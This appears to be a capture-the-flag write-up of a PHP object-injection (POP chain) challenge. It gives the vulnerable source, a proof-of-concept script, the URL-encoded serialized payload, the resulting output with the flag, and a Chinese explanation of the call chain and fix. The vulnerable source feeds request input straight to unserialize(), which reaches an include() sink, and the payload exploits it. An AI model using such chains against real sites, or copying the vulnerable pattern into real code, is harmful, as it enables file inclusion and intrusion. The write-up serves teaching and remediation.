源码 <?php
/**
 * End of the gadget chain: an instance that is called like a function ends up
 * include()-ing whatever path is stored in its private $arrow.
 */
class Sagittarius {
    // Path later handed to include(). When the object is rebuilt by unserialize(),
    // this value is whatever the serialized input says.
    private $arrow ;

    /**
     * Prints its own method name, includes $value and echoes $flag.
     *
     * @param mixed $value path passed straight to include(); nothing here validates
     *                     it or checks it against an allow-list
     */
    public function append ($value ) {
        printf ("%s\n" , __METHOD__ );
        // File-inclusion sink: the argument is whatever the caller passes in.
        include ($value );
        // $flag is not defined in this method; presumably the included file sets it -- TODO confirm.
        echo $flag ;
    }

    /**
     * Runs when a Sagittarius object is called as a function; forwards
     * $this->arrow to append().
     */
    public function __invoke ( ) {
        printf ("%s\n" , __METHOD__ );
        $this ->append ($this ->arrow);
    }
}

/**
 * Holds two public properties and two magic methods that react to
 * deserialization (__wakeup) and to string conversion (__toString).
 */
class Guardian {
    public $jupiter ;
    public $zeus ;

    /**
     * Runs when the object is used as a string. Reads ->zeus on $this->jupiter;
     * if $jupiter is an object with no accessible `zeus` property, that read is
     * routed to its __get(). PHP requires a string return value here, so a
     * non-string result raises a fatal error.
     */
    public function __toString ( ) {
        printf ("%s\n" , __METHOD__ );
        return $this ->jupiter->zeus;
    }

    /**
     * Called by unserialize() once the object's properties have been restored.
     * echo converts $this->zeus to a string, so an object stored there has its
     * __toString() invoked.
     */
    public function __wakeup ( ) {
        printf ("%s\n" , __METHOD__ );
        echo $this ->zeus;
    }
}

/**
 * Wrapper whose __get() calls the value held in $source as a function.
 */
class Target {
    public $source ;

    // Sets $source to an empty array. unserialize() does not run constructors,
    // so this default does not apply to objects rebuilt from request data.
    public function __construct ( ) {
        $this ->source = array ();
    }

    /**
     * Runs on a read of an undefined or inaccessible property. Calls
     * $this->source as a callable, so an object stored there has its
     * __invoke() run. $key is not used.
     */
    public function __get ($key ) {
        printf ("%s\n" , __METHOD__ );
        $func = $this ->source;
        return $func ();
    }
}

// NOTE(review): unserialize() is applied directly to request input. Every class
// declared above can be instantiated with caller-chosen property values, and
// __wakeup() runs immediately, so the magic methods chain into the include() in
// Sagittarius::append(). Prefer json_decode() for untrusted input, or pass
// ['allowed_classes' => false] as the second argument to unserialize().
if (isset ($_REQUEST ['Sagittarius' ])) {
    unserialize ($_REQUEST ['Sagittarius' ]);
} else {
    echo "系统检测发现该处漏洞,进行攻击测试\n" ;
}
?>
POC <?php
// Local stand-ins for the target's classes. No methods are declared here: the
// serialized form carries only class names, property names and values, and the
// methods that run are the ones defined on the side that calls unserialize().
class Sagittarius {
    // Private, so it is serialized under the NUL-delimited name "\0Sagittarius\0arrow".
    private $arrow = 'flag.php' ;
}
class Guardian {
    public $jupiter ;
    public $zeus ;
}
class Target {
    public $source ;
}
$s = new Sagittarius ();
$g = new Guardian ();
$t = new Target ();
// zeus points back at the Guardian itself; it is serialized as a back-reference.
$g ->zeus = $g ;
// $g->zeus is $g, so this assigns the Target to $g->jupiter.
$g ->zeus->jupiter = $t ;
$t ->source = $s ;
// URL-encoded so the NUL bytes and quotes survive inside a request parameter.
// The result is a serialized object graph (it starts with "O:"); request
// parameters carrying such strings are a useful detection signal.
echo urlencode (serialize ($g ));
O%3A8%3A%22Guardian%22%3A2%3A%7Bs%3A7%3A%22jupiter%22%3BO%3A6%3A%22Target%22%3A1%3A%7Bs%3A6%3A%22source%22%3BO%3A11%3A%22Sagittarius%22%3A1%3A%7Bs%3A18%3A%22%00Sagittarius%00arrow%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7Ds%3A4%3A%22zeus%22%3Br%3A1%3B%7D
得到
Guardian::__wakeup
Guardian::__toString
Target::__get
Sagittarius::__invoke
Sagittarius::append
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}
Catchable fatal error: Method Guardian::__toString() must return a string value in /var/www/html/module/source.php on line 36
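pop 链入口:Guardian::__wakeup
pop 链目标:Sagittarius::__invoke
调用顺序(与上面的输出一致):unserialize → Guardian::__wakeup(echo 触发字符串转换)→ Guardian::__toString(读取不存在的属性)→ Target::__get(把 source 当作函数调用)→ Sagittarius::__invoke → Sagittarius::append(include);最后的 fatal error 是因为 __toString 没有返回字符串。
根因是对请求参数直接调用 unserialize;修复时应避免反序列化不可信输入(改用 json_decode,或给 unserialize 传入 ['allowed_classes' => false]),并且不要把对象属性直接传给 include。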
参考:https://www.yuque.com/shiyizhesonder/sonder39/dgqgwnxbpu74mvvc
https://www.yuque.com/shiyizhesonder/sonder39/wknqdphecihy73u1